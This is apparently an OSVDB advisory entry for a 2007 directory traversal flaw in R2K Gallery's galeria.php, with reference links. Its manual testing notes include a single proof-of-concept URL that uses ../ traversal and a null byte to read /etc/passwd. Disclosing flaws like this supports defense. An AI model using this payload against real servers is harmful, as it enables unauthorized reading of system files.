R2K Gallery galeria.php lang2 Variable Traversal Arbitrary File Access

2007-05-11T07:03:57
ID OSVDB:36015
Type osvdb
Reporter OSVDB
Modified 2007-05-11T07:03:57

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00

References:

Vendor URL: http://usuarios.lycos.es/r2kscripts/ Secunia Advisory ID:25261 Other Advisory URL: http://0day.2600.ir/exploits/3902 Mail List Post: http://attrition.org/pipermail/vim/2007-May/001615.html ISS X-Force ID: 34238 Generic Exploit URL: http://www.milw0rm.com/exploits/3902 FrSIRT Advisory: ADV-2007-1783 CVE-2007-2642 Bugtraq ID: 23938